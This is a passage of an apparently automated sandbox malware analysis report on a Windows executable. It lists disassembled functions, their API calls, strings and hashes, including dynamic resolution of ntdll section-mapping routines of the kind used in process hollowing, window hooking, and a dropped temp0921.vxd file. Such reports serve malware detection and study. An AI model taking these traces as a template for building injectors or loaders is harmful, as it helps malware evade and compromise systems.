                                                                                                                                              • CreateFileA.KERNEL32(C0000000,00000003,00000000,00000002,00000090,00000000), ref: 00403D3C
                                                                                                                                              • WriteFile.KERNEL32(00000000,0042FA48,00001270,?,00000000), ref: 00403D60
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403D6A
                                                                                                                                              • DeleteFileA.KERNEL32(00447800), ref: 00403DE2
                                                                                                                                                • Part of subcall function 0040251B: CharNextA.USER32(?,?,00000000,00000000,00402825,?,?,?,00000000,?), ref: 00402548
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CharDelete$CloseCreateDirectoryHandleInitializeLowerMessageModuleNameNextSystemUninitializeVersionWritelstrlen
                                                                                                                                              • String ID: %s%s$%s%s%s$.dll$\\.\$temp0921.vxd
                                                                                                                                              • API String ID: 1553515636-1906822863
                                                                                                                                              • Opcode ID: 0d65bbf1805183a64baca0f02ee02aa9a5489940a6456a861ec73bf611a059c0
                                                                                                                                              • Instruction ID: 408f333712ebdddcccb1fd84654ab834d5505da6427f59c8e72a8d2f52c591c3
                                                                                                                                              • Opcode Fuzzy Hash: 0d65bbf1805183a64baca0f02ee02aa9a5489940a6456a861ec73bf611a059c0
                                                                                                                                              • Instruction Fuzzy Hash: D5C1D331904209AADB15AFA1DC86EEE7B38EF11319F20407FF401B10E1DB799E45CA6D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004257B5 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 169stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004257ED
                                                                                                                                              • GetClassLongA.USER32(?,000000E6), ref: 00425832
                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(?,00000000,00000005), ref: 0042585E
                                                                                                                                              • lstrcmpiA.KERNEL32(?,ime), ref: 0042586D
                                                                                                                                              • SetWindowLongA.USER32(?,000000FC,Function_00024DF1), ref: 004258A7
                                                                                                                                              • CallNextHookEx.USER32(?,00000003,?,?), ref: 004259A2
                                                                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 004259B3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Hook$CallLongNext$AtomClassGlobalNameUnhookWindowWindowslstrcmpi
                                                                                                                                              • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                              • API String ID: 1393834995-4034971020
                                                                                                                                              • Opcode ID: 07b41bb835b3f37ab2ea62d7d951dc66333286f1985a8da89310b5e237e0c8ee
                                                                                                                                              • Instruction ID: 57621b77eae36dfeccc30f2fe0fb6956200ccb49a91ce200666df048497e576e
                                                                                                                                              • Opcode Fuzzy Hash: 07b41bb835b3f37ab2ea62d7d951dc66333286f1985a8da89310b5e237e0c8ee
                                                                                                                                              • Instruction Fuzzy Hash: 8D519F71600225EBCF21AF50EC08B9A3B75EF09325F904136F814962A0CB79C951CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040CEAB Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(USER32,?,?,?,0040CFFC), ref: 0040CED4
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040CEF0
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040CF01
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040CF12
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040CF23
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040CF34
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040CF45
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040CF56
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                              • API String ID: 667068680-68207542
                                                                                                                                              • Opcode ID: 4079817142a34cec938b4e8f1ad559f573af29b2feabc9793cceecdad33a04ac
                                                                                                                                              • Instruction ID: d1c05c8d3ab6442c21aa33543c3d481af1cb9795c094473826c90fb8c1184408
                                                                                                                                              • Opcode Fuzzy Hash: 4079817142a34cec938b4e8f1ad559f573af29b2feabc9793cceecdad33a04ac
                                                                                                                                              • Instruction Fuzzy Hash: 7A214FB8A84641DBC3019F65ACC092ABAE2F64EB41750097FE214E26E0CB3860569B1F
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040B5F9 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 52libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,RtlInitUnicodeString,?,?,?,0040B8FD), ref: 0040B60D
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B616
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,0040B8FD), ref: 0040B62B
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B62E
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtOpenSection,?,?,?,0040B8FD), ref: 0040B63F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B642
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,?,?,?,0040B8FD), ref: 0040B653
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B656
                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,RtlNtStatusToDosError,?,?,?,0040B8FD), ref: 0040B667
                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040B66A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                                                                                                                                              • API String ID: 1646373207-1987783197
                                                                                                                                              • Opcode ID: 03ece5295bc5d19dd18cc425d4baeeadd3cb99d471744734dea2df15ba55ecb3
                                                                                                                                              • Instruction ID: 970ede4e035025aba40728b845774641aeb06da0a28e5589127ba931f0dc7916
                                                                                                                                              • Opcode Fuzzy Hash: 03ece5295bc5d19dd18cc425d4baeeadd3cb99d471744734dea2df15ba55ecb3
                                                                                                                                              • Instruction Fuzzy Hash: 5CF062E6A4431576DB306B795C85E572EDCE9497907102C73A804E3191DB7DC801EABC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00402214 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 270stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CharNextA.USER32(?,?,00000000,004462BC,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 0040224A
                                                                                                                                              • CharNextA.USER32(00000000,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 0040228E
                                                                                                                                              • CharNextA.USER32(00000000,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004022BB
                                                                                                                                              • CharNextA.USER32(00000000), ref: 004022D0
                                                                                                                                              • CharNextA.USER32(00000000), ref: 004022E4
                                                                                                                                              • CharNextA.USER32(00000000), ref: 00402305
                                                                                                                                              • CharNextA.USER32(00000000), ref: 00402361
                                                                                                                                              • lstrlenA.KERNEL32(-00010073), ref: 00402438
                                                                                                                                              • OutputDebugStringA.KERNEL32(Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class.), ref: 0040246B
                                                                                                                                              • DebugBreak.KERNEL32 ref: 00402471
                                                                                                                                              • CharNextA.USER32(?,?,00000000,004462BC,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004024BD
                                                                                                                                              • CharNextA.USER32(?,?,004462BC,%s%s%s,?,00430E68,temp0921.vxd), ref: 004024C6
                                                                                                                                              • wvsprintfA.USER32(?,?,?), ref: 004024ED
                                                                                                                                              Strings
                                                                                                                                              • Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class., xrefs: 00402466
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Debug$BreakOutputStringlstrlenwvsprintf
                                                                                                                                              • String ID: Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CMyString class.
                                                                                                                                              • API String ID: 3364312739-4257885759
                                                                                                                                              • Opcode ID: a824a2b543f5762c82e423326e6c2dab26c1ef602594b2f11e18d853935b28d7
                                                                                                                                              • Instruction ID: 0eedb994684fcdbb03af904bb600abb34cd9bd0cefedc73d8d84e7d0e4219dbe
                                                                                                                                              • Opcode Fuzzy Hash: a824a2b543f5762c82e423326e6c2dab26c1ef602594b2f11e18d853935b28d7
                                                                                                                                              • Instruction Fuzzy Hash: 0081E1715082425ADB319E388F4C23BBBD4AB55354F58057FE8C0F22D5D6FCCA8A865E
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0041E5CA Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 90libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,0043A978,0000000C,?), ref: 0041E5E2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041E5FE
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041E60F
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041E61C
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0041E632
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0041E643
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                              • String ID: $GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                                                                                              • API String ID: 2238633743-752805172
                                                                                                                                              • Opcode ID: 3d8efab7ff49af663c91057f34e0c8ce06715d0f196f9146fd83b2926ff60567
                                                                                                                                              • Instruction ID: a1566a43e676663f77566d211b6d4cd8a5d02c20358371a1fa29f3d6f93bbe0d
                                                                                                                                              • Opcode Fuzzy Hash: 3d8efab7ff49af663c91057f34e0c8ce06715d0f196f9146fd83b2926ff60567
                                                                                                                                              • Instruction Fuzzy Hash: 7F219938B00305FADB119FB69C45FAB7AA8EB55784F84013ABD05D1150EB78C881DFAD
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00414B8A Relevance: 21.4, APIs: 14, Instructions: 354windowkeyboardCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Focus$Message$ParentStateWindow$BeepDialogSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 275928742-0
                                                                                                                                              • Opcode ID: 29edca6921028beb0b146ee492515b4863a2a01fbf38321ee019951345c7bbf6
                                                                                                                                              • Instruction ID: b7f21489c7d6d74e7554cfe8760b2d28968a599f813f330fded3cbbafc593dd2
                                                                                                                                              • Opcode Fuzzy Hash: 29edca6921028beb0b146ee492515b4863a2a01fbf38321ee019951345c7bbf6
                                                                                                                                              • Instruction Fuzzy Hash: FDC1BF35A00215AADF20AF65D844AFFBBB5EFC4758F55402BE811A7250DB3C9CC2CA9D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00424031 Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              • GetParent.USER32(?), ref: 0042405C
                                                                                                                                              • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 0042407F
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00424098
                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 004240AB
                                                                                                                                              • CopyRect.USER32(?,?), ref: 004240F8
                                                                                                                                              • CopyRect.USER32(?,?), ref: 00424102
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0042410B
                                                                                                                                              • CopyRect.USER32(?,?), ref: 00424127
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 808654186-0
                                                                                                                                              • Opcode ID: 5c1e3401e94f9ddfb7b0304fefac56a9f4397806790fe2ce614e2b01d900ef57
                                                                                                                                              • Instruction ID: 208623173516fe0c4c79c90a83d200c0856f8fa8b1e61f7fada478de943c47ba
                                                                                                                                              • Opcode Fuzzy Hash: 5c1e3401e94f9ddfb7b0304fefac56a9f4397806790fe2ce614e2b01d900ef57
                                                                                                                                              • Instruction Fuzzy Hash: 31518771A00229ABDB10DBA8DC85EEF77B9EF84314F554125F601F3280D774A9468B58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042D2FB Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 182memorystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(?,00439AF0), ref: 0042D37B
                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0042D3A1
                                                                                                                                              • lstrlenA.KERNEL32(?,00439AF0), ref: 0042D3B9
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D3DD
                                                                                                                                              • lstrlenA.KERNEL32(?,0000F108,?,00000100,d}C,00439AF0), ref: 0042D42E
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D454
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0042D474
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D498
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0042D4C1
                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042D4E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocStringlstrlen
                                                                                                                                              • String ID: d}C
                                                                                                                                              • API String ID: 98960487-3319508351
                                                                                                                                              • Opcode ID: 66b24d67ede51495c4957cf5ca69243bc8b93e62e85c6dcf95a10c59674b6767
                                                                                                                                              • Instruction ID: 185ff175cf529db1f2f1588e15c7f847109819f6a9f20bd73b9045780a2bba21
                                                                                                                                              • Opcode Fuzzy Hash: 66b24d67ede51495c4957cf5ca69243bc8b93e62e85c6dcf95a10c59674b6767
                                                                                                                                              • Instruction Fuzzy Hash: 7451A376A00219ABCB10EF75DD45A9ABBB8EF05314F508527F815D7241D738E990CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025D42C4 Relevance: 18.4, APIs: 1, Strings: 11, Instructions: 353COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: self.ref_count() > 0, xrefs: 025D5230
                                                                                                                                              • [internal exception] blocking task ran twice./registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\task.rs, xrefs: 025D52C9
                                                                                                                                              • attempt to divide by zero, xrefs: 025D521C
                                                                                                                                              • assertion failed: curr.is_join_waker_set(), xrefs: 025D54B4
                                                                                                                                              • assertion failed: curr.is_join_interested(), xrefs: 025D54A0, 025D556E
                                                                                                                                              • assertion failed: prev.ref_count() >= 1, xrefs: 025D5582, 025D55B5, 025D561A
                                                                                                                                              • Invalid, xrefs: 025D528D, 025D54DE
                                                                                                                                              • assertion failed: next.is_notified()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\state.rs, xrefs: 025D5208
                                                                                                                                              • n failed: prev.ref_count() >= 2, xrefs: 025D57BF
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 025D5325
                                                                                                                                              • assertion failed: snapshot.is_complete()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\task\harness.rs, xrefs: 025D54F2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
